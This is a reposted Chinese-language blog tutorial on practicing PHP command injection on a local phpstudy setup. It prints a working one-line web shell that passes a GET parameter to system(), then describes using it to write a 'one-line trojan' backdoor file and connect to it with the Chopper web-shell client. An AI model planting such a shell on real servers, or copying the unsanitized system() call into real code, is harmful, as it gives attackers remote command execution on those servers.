资源分享

利用php进行命令注入攻击演练

字号+ 作者:0nise 来源:转载 2016-11-25 09:26 我要评论( )

本机搭建php环境我用的是phpstudy 软件下载地址: http://www.baidu.com 自己配置phpstudy 我就不废话了 网站根目录新建index.php名字随便啊index 我只是图一个方......

本机搭建php环境我用的是phpstudy
软件下载地址:http://www.baidu.com
自己配置phpstudy 我就不废话了


网站根目录新建index.php  名字随便啊  index 我只是图一个方便而已~~!

<?$cmd = $_GET["cmd"];echo "<pre>";system($cmd);echo "</pre>";?>
代码写入  然后本机访问网站


接下来传入我们要执行的cmd的命令
通过get的请求方式来 传入


把ipconfig这个值赋值给cmd变量

$cmd = $_GET["cmd"];
然后$cmd通过get方式得到用户传入值

system($cmd);
system()函数进行执行

本机测试新建一个php脚本文件
打开本机cmd,测试创一个脚本文件写入内容

查看文件是否写入

写入成功!php环境执行写入一句话木马!


ok写入成功!,访问0nise.php


ok一句话解析成功!菜刀连接~~

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Share/254.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
  • php过狗一句话

    php过狗一句话

    2016-11-27 15:55

  • PHP免杀shell的编写,附免杀shell

    PHP免杀shell的编写,附免杀shell

    2016-11-24 20:48

网友点评
暂时未开启评论功能~